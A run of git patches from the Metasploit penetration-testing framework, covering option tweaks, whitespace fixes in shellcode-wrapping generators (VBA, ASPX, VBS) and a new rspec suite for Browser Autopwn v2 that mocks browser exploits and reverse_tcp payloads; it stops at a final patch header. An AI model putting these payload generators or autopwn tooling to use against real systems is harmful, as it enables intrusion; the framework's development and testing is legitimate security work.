@@ -43,7 +44,7 @@ module MeterpreterOptions
     valid = true
 
     if datastore['AutoVerifySession'] == true
-      if not session.is_valid_session?
+      if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i)
         print_error("Meterpreter session #{session.sid} is not valid and will be closed")
         valid = false
       end

From 67065e104ae94638dcdaa450aee5b65cac58583a Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 16 Jun 2015 11:05:03 -0500
Subject: [PATCH 0428/1013] Update database.yml.example to ref MSF-DEV

We no longer rely on the Fedora Project's documentation for setting up a
PostgreSQL database. The comment doc here should reflect this change.
---
 config/database.yml.example | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/config/database.yml.example b/config/database.yml.example
index dfcb0c9213..060dd23625 100644
--- a/config/database.yml.example
+++ b/config/database.yml.example
@@ -3,8 +3,7 @@
 # these days. (No SQLite, no MySQL).
 #
 # To set up a metasploit database, follow the directions hosted at:
-# https://fedoraproject.org/wiki/Metasploit_Postgres_Setup (Works on
-# essentially any Linux distro, not just Fedora)
+# http://r-7.co/MSF-DEV#set-up-postgresql
 development: &pgsql
   adapter: postgresql
   database: metasploit_framework_development

From 3410782fe96ccd14831106e7d47fb40483135303 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Tue, 16 Jun 2015 11:52:42 +0100
Subject: [PATCH 0429/1013] Capitalized 'Accepted'

---
 features/modules/exploit/smb/ms08_067_netapi.feature | 4 ++--
 lib/msf/core/opt_enum.rb                             | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature
index f8c30e7e59..e23730be1c 100644
--- a/features/modules/exploit/smb/ms08_067_netapi.feature
+++ b/features/modules/exploit/smb/ms08_067_netapi.feature
@@ -148,12 +148,12 @@ Feature: MS08-067 netapi
 
          Name           : SSLVerifyMode
          Current Setting: PEER
-         Description    : SSL verification method (accepted: CLIENT_ONCE,
+         Description    : SSL verification method (Accepted: CLIENT_ONCE,
             FAIL_IF_NO_PEER_CERT, NONE, PEER)
 
          Name           : SSLVersion
          Current Setting: SSL3
-         Description    : Specify the version of SSL that should be used (accepted: SSL2,
+         Description    : Specify the version of SSL that should be used (Accepted: SSL2,
             SSL3, TLS1)
 
          Name           : VERBOSE
diff --git a/lib/msf/core/opt_enum.rb b/lib/msf/core/opt_enum.rb
index 74fdbe1c27..bfe0754ecf 100644
--- a/lib/msf/core/opt_enum.rb
+++ b/lib/msf/core/opt_enum.rb
@@ -35,7 +35,7 @@ class OptEnum < OptBase
     if self.enums
       str = self.enums.join(', ')
     end
-    "#{self.desc_string || ''} (accepted: #{str})"
+    "#{self.desc_string || ''} (Accepted: #{str})"
   end
 
 

From 33139c4ecd8047c3c98544ed356eb8d2fc729bc7 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Tue, 16 Jun 2015 20:42:47 +0100
Subject: [PATCH 0430/1013] shell_to_meterpreter minor improvements

---
 .../post/multi/manage/shell_to_meterpreter.rb    | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
index c06e5f8c46..401063598b 100644
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -29,19 +29,19 @@ class Metasploit3 < Msf::Post
     register_options(
       [
         OptAddress.new('LHOST',
-          [false, 'IP of host that will receive the connection from the payload.']),
+          [false, 'IP of host that will receive the connection from the payload (Will try to auto detect).', nil]),
         OptInt.new('LPORT',
-          [false, 'Port for payload to connect to.', 4433]),
+          [true, 'Port for payload to connect to.', 4433]),
         OptBool.new('HANDLER',
           [ true, 'Start an exploit/multi/handler to receive the connection', true])
       ], self.class)
     register_advanced_options([
       OptInt.new('HANDLE_TIMEOUT',
-        [false, 'How long to wait for the session to come back', 30]),
-      OptString.new('WIN_TRANSFER',
-        [false, 'Which method to try first to transfer files on a Windows target. Valid values are: POWERSHELL, VBS', 'POWERSHELL']),
-      OptString.new('PAYLOAD_OVERWRITE',
-        [false, 'Overwrite the default payload', nil])
+        [true, 'How long to wait (in seconds) for the session to come back.', 30]),
+      OptEnum.new('WIN_TRANSFER',
+        [true, 'Which method to try first to transfer files on a Windows target.', 'POWERSHELL', ['POWERSHELL', 'VBS']]),
+      OptString.new('PAYLOAD_OVERRIDE',
+        [false, 'Define the payload to use (meterpreter/reverse_tcp by default) .', nil])
     ], self.class)
     deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
   end
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Post
     print_status("Upgrading session ID: #{datastore['SESSION']}")
 
     if session.type =~ /meterpreter/
-      print_error("Shell type is already Meterpreter.")
+      print_error("Shell is already Meterpreter.")
       return nil
     end
 

From f2e2af1c421bd7582c4edc6735acf8ffd817104f Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 16 Jun 2015 18:37:32 -0500
Subject: [PATCH 0431/1013] Remove msfencode from the gemspec

---
 metasploit-framework.gemspec | 1 -
 1 file changed, 1 deletion(-)

diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 376f22f6b6..b528c3ba13 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -34,7 +34,6 @@ Gem::Specification.new do |spec|
       'msfconsole',
       'msfd',
       'msfelfscan',
-      'msfencode',
       'msfmachscan',
       'msfpescan',
       'msfrop',

From b40e9f6d460bb0bbe87558bea38800314cdf0883 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Wed, 17 Jun 2015 01:10:18 +0100
Subject: [PATCH 0432/1013] util/exe - replace tabs with spaces

...formatting should be okay still
---
 lib/msf/util/exe.rb | 38 +++++++++++++++++++-------------------
 1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index b20a091633..79a2c42946 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -671,7 +671,7 @@ require 'msf/core/exe/segment_appender'
 
     msi = self.get_file_contents(template)
 
-    section_size =	2**(msi[30..31].unpack('v')[0])
+    section_size = 2**(msi[30..31].unpack('v')[0])
 
     # This table is one of the few cases where signed values are needed
     sector_allocation_table = msi[section_size..section_size*2].unpack('l<*')
@@ -978,24 +978,24 @@ require 'msf/core/exe/segment_appender'
 
   def self.to_vba(framework,code,opts = {})
     hash_sub = {}
-    hash_sub[:var_myByte]		  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
-    hash_sub[:var_myArray]		  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
-    hash_sub[:var_rwxpage]  	  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
-    hash_sub[:var_res]      	  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
-    hash_sub[:var_offset] 		  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_myByte]             = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_myArray]            = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_rwxpage]            = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_res]                = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_offset]             = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
     hash_sub[:var_lpThreadAttributes] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
     hash_sub[:var_dwStackSize]        = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
     hash_sub[:var_lpStartAddress]     = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
     hash_sub[:var_lpParameter]        = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
-    hash_sub[:var_dwCreationFlags]	  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_dwCreationFlags]    = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
     hash_sub[:var_lpThreadID]         = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
     hash_sub[:var_lpAddr]             = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
     hash_sub[:var_lSize]              = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
     hash_sub[:var_flAllocationType]   = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
     hash_sub[:var_flProtect]          = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
-    hash_sub[:var_lDest]	          = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
-    hash_sub[:var_Source]	 	  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
-    hash_sub[:var_Length]		  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_lDest]              = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_Source]             = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_Length]             = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
 
     # put the shellcode bytes into an array
     hash_sub[:bytes] = Rex::Text.to_vbapplication(code, hash_sub[:var_myArray])
@@ -1081,13 +1081,13 @@ require 'msf/core/exe/segment_appender'
 
   def self.to_exe_aspx(exes = '', opts = {})
     hash_sub = {}
-    hash_sub[:var_file] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_tempdir] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_basedir]	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_file]     = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempdir]  = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_basedir]  = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_filename] = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_tempexe] 	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempexe]  = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_iterator] = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_proc]	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
 
     hash_sub[:shellcode] = Rex::Text.to_csharp(exes,100,hash_sub[:var_file])
 
@@ -1729,8 +1729,8 @@ require 'msf/core/exe/segment_appender'
 
     set_handler:
       xor eax,eax
-;		  push dword [fs:eax]
-;		  mov dword [fs:eax], esp
+;     push dword [fs:eax]
+;     mov dword [fs:eax], esp
       push eax               ; LPDWORD lpThreadId (NULL)
       push eax               ; DWORD dwCreationFlags (0)
       push eax               ; LPVOID lpParameter (NULL)
@@ -1741,10 +1741,10 @@ require 'msf/core/exe/segment_appender'
       call ebp               ; Spawn payload thread
 
       pop eax                ; Skip
-;		  pop eax                ; Skip
+;     pop eax                ; Skip
       pop eax                ; Skip
       popad                  ; Get our registers back
-;		  sub esp, 44             ; Move stack pointer back past the handler
+;     sub esp, 44             ; Move stack pointer back past the handler
     ^
 
     stub_final = %Q^

From 37546c7e18b6df33b53c15f0ac800c8eea109f2b Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Wed, 17 Jun 2015 01:13:33 +0100
Subject: [PATCH 0433/1013] to_exe_vbs - Allow for exe_filename to be defined

---
 lib/msf/util/exe.rb | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 79a2c42946..7d6ea6e274 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1035,16 +1035,16 @@ require 'msf/core/exe/segment_appender'
     persist = opts[:persist] || false
 
     hash_sub = {}
+    hash_sub[:exe_filename]  = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
     hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:exe_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
-    hash_sub[:var_fname]   = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_func]    = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_stream]  = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_obj]     = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_shell]   = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_fname]     = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_func]      = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_stream]    = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_obj]       = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_shell]     = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempdir]   = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempexe]   = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_basedir]   = Rex::Text.rand_text_alpha(rand(8)+8)
 
     hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
 

From 089579e3542b7e6bb51105803bf293f0914d54cc Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 16 Jun 2015 23:04:12 -0500
Subject: [PATCH 0434/1013] This is how much rspec I have so far for
 browser_autopwnv2_spec.rb

---
 .../core/exploit/browser_autopwnv2_spec.rb    | 537 ++++++++++++++++++
 1 file changed, 537 insertions(+)
 create mode 100644 spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb

diff --git a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
new file mode 100644
index 0000000000..b724cef4cc
--- /dev/null
+++ b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
@@ -0,0 +1,537 @@
+require 'msf/core'
+
+describe Msf::Exploit::Remote::BrowserAutopwnv2 do
+
+
+
+  #
+  # Recreate the environment (framework, mixins, etc)
+  #
+
+
+
+  def mock_note_destroy
+    # The destory method doesn't pass the note as an argument like framework.jobs_stop_job.
+    # So here's I'm just gonna clear them all, and that sort of mimics #destroy.
+    framework = double('Msf::Framework', datastore: {})
+
+    # This empties it
+    notes = []
+
+    db = double('db')
+    allow(db).to receive(:notes).and_return(notes)
+    allow(framework).to receive(:db).and_return(db)
+
+    allow(subject).to receive(:framework).and_return(framework)
+  end
+
+  def create_fake_note(tag, data)
+    note = double('note')
+
+    allow(note).to receive(:ntype).and_return(tag)
+    allow(note).to receive(:data).and_return(data)
+    allow(note).to receive(:destroy) { mock_note_destroy }
+
+    note
+  end
+
+  def mock_stop_job(arg)
+    framework = double('Msf::Framework', datastore: {})
+    jobs = subject.framework.jobs.delete_if {|e| e.first == arg.to_s}
+    allow(jobs).to receive(:stop_job) { |arg| mock_stop_job(arg) }
+    allow(framework).to receive(:jobs).and_return(jobs)
+    allow(subject).to receive(:framework).and_return(framework)
+  end
+
+  def create_fake_job(id)
+    [id.to_s, double('job')]
+  end
+
+  def create_fake_exploit(opts={})
+    full_name         = opts[:full_name]
+    rank              = opts[:rank]            || 400
+    disclosure_date   = opts[:disclosure_date] || 'Dec 21 2014'
+    compat_payloads   = opts[:compat_payloads] || []
+    datastore_options = opts[:datastore_options] || {}
+
+    mod = Msf::Exploit.new
+    mod.extend(Msf::Exploit::Remote::BrowserExploitServer)
+
+    allow(mod).to receive(:fullname).and_return(full_name)
+    allow(mod).to receive(:rank).and_return(rank)
+    allow(mod).to receive(:disclosure_date).and_return(disclosure_date)
+    allow(mod).to receive(:compatible_payloads).and_return(compat_payloads)
+    allow(mod).to receive(:datastore).and_return(datastore_options)
+
+    mod
+  end
+
+  def create_fake_ms14_064
+    compat_payloads = ['windows/meterpreter/reverse_tcp']
+
+    create_fake_exploit(
+      full_name: 'windows/browser/ms14_064_ole_code_execution',
+      rank: 600,
+      disclosure_date: 'Nov 13 2014',
+      compat_payloads: compat_payloads,
+      datastore_options: {'URI'=>'/ms14_064'}
+    )
+  end
+
+  def create_fake_flash_net_connection_confusion
+    compat_payloads = ['windows/meterpreter/reverse_tcp', 'linux/x86/meterpreter/reverse_tcp']
+
+    create_fake_exploit(
+      full_name: 'multi/browser/adobe_flash_net_connection_confusion',
+      rank: 500,
+      disclosure_date: 'Mar 12 2015',
+      compat_payloads: compat_payloads,
+      datastore_options: {'URI'=>'/flash1'}
+    )
+  end
+
+  def create_fake_flash_uncompress_zlib_uaf
+    compat_payloads = ['windows/meterpreter/reverse_tcp', 'linux/x86/meterpreter/reverse_tcp']
+
+    create_fake_exploit(
+      full_name: 'multi/browser/adobe_flash_uncompress_zlib_uaf',
+      rank: 500,
+      disclosure_date: 'Apr 28 2014',
+      compat_payloads: compat_payloads,
+      datastore_options: {'URI'=>'/flash2'}
+    )
+  end
+
+  def create_fake_windows_meterpreter
+    p = Msf::Payload.new
+    p.platform.platforms << Msf::Module::Platform::Windows
+    p.arch << 'x86'
+    p.datastore['LPORT'] = '4444'
+    allow(p).to receive(:fullname).and_return('windows/meterpreter/reverse_tcp')
+    allow(p).to receive(:shortname).and_return('reverse_tcp')
+
+    p
+  end
+
+  def create_fake_linux_meterpreter
+    p = Msf::Payload.new
+    p.platform.platforms << Msf::Module::Platform::Linux
+    p.arch << 'x86'
+    p.datastore['LPORT'] = '4445'
+    allow(p).to receive(:fullname).and_return('linux/x86/meterpreter/reverse_tcp')
+    allow(p).to receive(:shortname).and_return('reverse_tcp')
+
+    p
+  end
+
+  def mock_payload_create(full_name)
+    available_payloads.each do |p|
+      return p if p.fullname == full_name
+    end
+
+    nil
+  end
+
+  def mock_exploit_create(full_name)
+    available_exploits.each do |x|
+      return x if x.fullname == full_name
+    end
+
+    nil
+  end
+
+  let(:available_exploits) do
+    @exploits ||= lambda {
+      exploits = []
+
+      exploits << create_fake_ms14_064
+      exploits << create_fake_flash_uncompress_zlib_uaf
+      exploits << create_fake_flash_net_connection_confusion
+
+      exploits
+    }.call
+  end
+
+  let(:available_payloads) do
+    @payloads ||= lambda {
+        payloads = []
+
+        payloads << create_fake_windows_meterpreter
+        payloads << create_fake_linux_meterpreter
+
+        payloads
+      }.call
+  end
+
+  let(:fake_exploit_hash) do
+    exploits = {}
+
+    available_exploits.each do |x|
+      exploits[x.fullname.to_s] = '__SYMBOLIC__'
+    end
+
+    exploits
+  end
+
+  let(:autopwn_datastore_options) do
+    {
+      'SRVHOST'               => '0.0.0.0',
+      'SRVPORT'               => 8080,
+      'MaxExploits'           => 20,
+      'MaxSessions'           => -1,
+      'PAYLOAD_ANDROID'       => 'android/meterpreter/reverse_tcp',
+      'PAYLOAD_FIREFOX'       => 'firefox/shell_reverse_tcp',
+      'PAYLOAD_GENERIC'       => 'generic/shell_reverse_tcp',
+      'PAYLOAD_JAVA'          => 'java/meterpreter/reverse_tcp',
+      'PAYLOAD_LINUX'         => 'linux/x86/meterpreter/reverse_tcp',
+      'PAYLOAD_OSX'           => 'osx/x86/shell_reverse_tcp',
+      'PAYLOAD_UNIX'          => 'cmd/unix/reverse',
+      'PAYLOAD_WIN'           => 'windows/meterpreter/reverse_tcp',
+      'PAYLOAD_ANDROID_LPORT' => 4443,
+      'PAYLOAD_FIREFOX_LPORT' => 4442,
+      'PAYLOAD_GENERIC_LPORT' => 4459,
+      'PAYLOAD_JAVA_LPORT'    => 4448,
+      'PAYLOAD_LINUX_LPORT'   => 4445,
+      'PAYLOAD_OSX_LPORT'     => 4447,
+      'PAYLOAD_UNIX_LPORT'    => 4446,
+      'PAYLOAD_WIN_LPORT'     => 4444
+    }
+  end
+
+  # When unpacked, this gives us:
+  # {
+  #   "BAP.1433806920.Client.blLGFIlwYrxfvcY" => {
+  #     "source"      => "script",
+  #     "os_name"     => "Windows 8.1",
+  #     "os_vendor"   => "undefined",
+  #     "os_device"   => "undefined",
+  #     "ua_name"     => "Firefox",
+  #     "ua_ver"      => "35.0",
+  #     "arch"        => "x86",
+  #     "java"        => "1.7",
+  #     "silverlight" => "false",
+  #     "flash"       => "14.0",
+  #     "vuln_test"   => "true",
+  #     "proxy"       => false,
+  #     "language"    => "en-US,en;q=0.5",
+  #     "tried"       => true
+  # }}
+  let(:profile_packed_data) do
+    "\x81\xD9%BAP.1433806920.Client.blLGFIlwYrxfvcY\x8E\xA6source\xA6script\xA7os_name\xABWindows 8.1\xA9os_vendor\xA9undefined\xA9os_device\xA9undefined\xA7ua_name\xA7Firefox\xA6ua_ver\xA435.0\xA4arch\xA3x86\xA4java\xA31.7\xABsilverlight\xA5false\xA5flash\xA414.0\xA9vuln_test\xA4true\xA5proxy\xC2\xA8language\xC4\x0Een-US,en;q=0.5\xA5tried\xC3"
+  end
+
+  let(:profile_tag) do
+    MessagePack.unpack(profile_packed_data).keys.first.split('.')[3]
+  end
+
+  let(:note_type_prefix) do
+    MessagePack.unpack(profile_packed_data).keys.first.split('.')[0,3] * "."
+  end
+
+
+  before(:each) do
+    framework = double('Msf::Framework', datastore: {})
+
+    # Prepare fake notes
+    notes = [create_fake_note("#{note_type_prefix}.#{profile_tag}", profile_packed_data)]
+
+    # Prepare framework.db
+    db = double('db')
+    allow(db).to receive(:report_note).with(kind_of(Hash)) { mock_report_note }
+    allow(db).to receive(:notes).and_return(notes)
+    allow(db).to receive(:active).and_return(true)
+    allow(framework).to receive(:db).and_return(db)
+
+    # Prepare framework.exploits
+    exploits = double('exploits')
+    allow(exploits).to receive(:create) { |arg| mock_exploit_create(arg) }
+    allow(exploits).to receive(:each_pair).and_yield(available_exploits[0].fullname, '__SYMBOLIC__').and_yield(available_exploits[1].fullname, '__SYMBOLIC__').and_yield(available_exploits[2].fullname, '__SYMBOLIC__')
+    allow(framework).to receive(:exploits).and_return(exploits)
+
+    # Prepare jobs
+    jobs = {'0' => create_fake_job(0)}
+    allow(jobs).to receive(:stop_job) { |arg| mock_stop_job(arg) }
+    allow(framework).to receive(:jobs).and_return(jobs)
+
+    # Prepare payloads
+    payloads = {}
+    available_payloads.each do |p|
+      payloads[p.fullname] = "__SYMBOLIC__"
+    end
+    allow(payloads).to receive(:create) { |arg| mock_payload_create(arg) }
+    allow(framework).to receive(:payloads).and_return(payloads)
+
+    allow_any_instance_of(described_class).to receive(:framework).and_return(framework)
+  end
+
+  subject do
+    mod = Msf::Exploit::Remote.allocate
+    mod.extend described_class
+    mod.send(:initialize)
+    mod.send(:datastore=, autopwn_datastore_options)
+    allow(mod).to receive(:fullname).and_return('multi/browser/autopwn')
+    mod
+  end
+
+
+
+  #
+  # Method testing starts here
+  #
+
+
+
+  describe '#init_exploits' do
+    before(:each) do
+      allow(subject).to receive(:set_exploit_options)
+      subject.instance_variable_set(:@bap_exploits, [])
+    end
+
+    context 'when two exploits are loaded' do
+      it 'saves two exploits in instance variable @bap_exploits' do
+        subject.init_exploits
+        expect(subject.instance_variable_get(:@bap_exploits).length).to eq(3)
+      end
+    end
+  end
+
+  describe '#note_type_prefix' do
+    it 'returns an unique note type' do
+      expect(subject.note_type_prefix).to match(/^BAP\.\d+\.Client$/)
+    end
+  end
+
+  describe '#rm_target_info_notes' do
+    before(:each) do
+      allow(subject).to receive(:note_type_prefix).and_return("#{note_type_prefix}.#{profile_tag}")
+    end
+
+    it 'empties target_info_notes' do
+      subject.rm_target_info_notes
+      expect(subject.framework.db.notes).to be_empty
+    end
+  end
+
+  context 'when removing jobs' do
+    let(:job_ids) do
+      ids = []
+
+      subject.framework.jobs.each do |job|
+        ids << job.first.to_i
+      end
+
+      ids
+    end
+
+    describe '#rm_exploit_jobs' do
+      before(:each) do
+        subject.instance_variable_set(:@exploit_job_ids, job_ids)
+      end
+
+      it 'empties jobs' do
+        expect(subject.framework.jobs.length).to eq(1)
+        subject.rm_exploit_jobs
+        expect(subject.framework.jobs).to be_empty
+      end
+    end
+
+    describe '#rm_payload_jobs' do
+      before(:each) do
+        subject.instance_variable_set(:@payload_job_ids, job_ids)
+      end
+
+      it 'empties jobs' do
+        expect(subject.framework.jobs.length).to eq(1)
+        subject.rm_payload_jobs
+        expect(subject.framework.jobs).to be_empty
+      end
+    end
+  end
+
+  describe '#set_exploit_options' do
+    before(:each) do
+      payload_info = {
+        payload_name: 'windows/meterpreter/reverse_tcp',
+        payload_lport: 4444
+      }
+
+      allow(subject).to receive(:select_payload).and_return([payload_info])
+    end
+
+    let(:xploit) do
+      create_fake_ms14_064
+    end
+
+    context 'when a module is given' do
+      before(:each) do
+        subject.instance_variable_set(:@bap_exploits, [])
+        subject.init_exploits
+        subject.set_exploit_options(xploit)
+      end
+
+      it 'sets the datastore options' do
+        expect(xploit.datastore['URIPATH']).to match(/^\/\w+/)
+      end
+
+      it 'sets Msf::Exploit::Remote::BrowserAutopwnv2 as MODULEOWNER' do
+        expect(xploit.datastore['MODULEOWNER']).to eq(Msf::Exploit::Remote::BrowserAutopwnv2)
+      end
+    end
+  end
+
+  describe '#is_resource_taken?' do
+    before(:each) do
+      allow(subject).to receive(:set_exploit_options)
+      subject.instance_variable_set(:@bap_exploits, [])
+      subject.init_exploits
+    end
+
+    let(:repeated_resource) { '/flash1' }
+
+    let(:non_repeated_resource) { '/unique' }
+
+    context 'when a resource is repeated' do
+      it 'returns true' do
+        expect(subject.is_resource_taken?(repeated_resource)).to be_truthy
+      end
+    end
+
+    context 'when a resource is not repeated' do
+      it 'returns false' do
+        expect(subject.is_resource_taken?(non_repeated_resource)).to be_falsey
+      end
+    end
+  end
+
+  describe '#assign_module_resource' do
+    it 'returns a resource' do
+      allow(subject).to receive(:is_resource_taken?).and_return(false)
+      expect(subject.assign_module_resource).to match(/^\w+$/)
+    end
+  end
+
+
+  context 'when sorting' do
+    before(:each) do
+      allow(subject).to receive(:set_exploit_options)
+      subject.instance_variable_set(:@bap_exploits, [])
+      subject.init_exploits
+    end
+
+    let(:bap_groups) { subject.group_bap_modules }
+
+    describe '#sort_date_in_group' do
+      it 'returns modules sorted by date' do
+        unsorted_first = 'multi/browser/adobe_flash_uncompress_zlib_uaf'
+        expect(bap_groups[500].first.fullname).to eq(unsorted_first)
+
+        sorted_first = 'multi/browser/adobe_flash_net_connection_confusion'
+        expect(subject.sort_date_in_group(bap_groups)[500].first.fullname).to eq(sorted_first)
+      end
+    end
+
+    describe '#sort_group_by_rank' do
+      it 'returns modules sorted by rank' do
+        unsorted_order = [0, 100, 200, 300, 400, 500, 600]
+        sorted_order = [0, 100, 200, 300, 400, 500, 600].reverse
+
+        expect(bap_groups.keys).to eq(unsorted_order)
+        expect(subject.sort_group_by_rank(bap_groups).keys).to eq(sorted_order)
+      end
+    end
+
+    describe '#group_bap_modules' do
+      it 'returns modules sorted by group' do
+        group_order = [0, 100, 200, 300, 400, 500, 600]
+        expect(bap_groups.keys).to eq(group_order)
+      end
+    end
+
+    describe '#finalize_sorted_modules' do
+      context 'when MaxExploits is 1' do
+        it 'returns one exploit' do
+          expect(subject.instance_variable_get(:@bap_exploits).length).to eq(3)
+
+          allow(subject).to receive(:datastore).and_return({'MaxExploits'=>1})
+          subject.finalize_sorted_modules(bap_groups)
+          expect(subject.instance_variable_get(:@bap_exploits).length).to eq(1)
+        end
+      end
+    end
+  end
+
+  describe '#get_selected_payload_name' do
+    context 'when windows platform is given' do
+      it 'returns windows/meterpreter/reverse_tcp' do
+        expect(subject.get_selected_payload_name('win')).to eq('windows/meterpreter/reverse_tcp')
+      end
+    end
+  end
+
+  describe '#get_selected_payload_lport' do
+  end
+
+  describe '#get_payload_lhost' do
+  end
+
+  describe '#start_payload_listeners' do
+  end
+
+  describe '#parse_rank' do
+  end
+
+  describe '#is_payload_platform_compatible?' do
+  end
+
+  describe '#is_payload_compatible?' do
+  end
+
+  describe '#is_multi_platform_exploit?' do
+  end
+
+  describe '#select_payload' do
+  end
+
+  describe '#start_exploits' do
+  end
+
+  describe '#show_ready_exploits' do
+  end
+
+  describe '#start_service' do
+  end
+
+  describe '#show_payloads' do
+  end
+
+  describe '#set_payload' do
+  end
+
+  describe '#get_suitable_exploits' do
+  end
+
+  describe '#log_click' do
+  end
+
+  describe '#show_real_list' do
+  end
+
+  describe '#get_exploit_urls' do
+  end
+
+  describe '#on_request_uri' do
+  end
+
+  describe '#is_ip_targeted?' do
+  end
+
+  describe '#session_count' do
+  end
+
+  describe '#get_custom_404_url' do
+  end
+
+  describe '#build_html' do
+  end
+
+end
\ No newline at end of file

From b1f68556f9c48896899b7fcd61b25309acd33ee1 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 17 Jun 2015 02:52:59 -0500
Subject: [PATCH 0435/1013] More testcases

---
 .../core/exploit/browser_autopwnv2_spec.rb    | 232 ++++++++++++++++--
 1 file changed, 208 insertions(+), 24 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
index b724cef4cc..8d0ea39a78 100644
--- a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
+++ b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
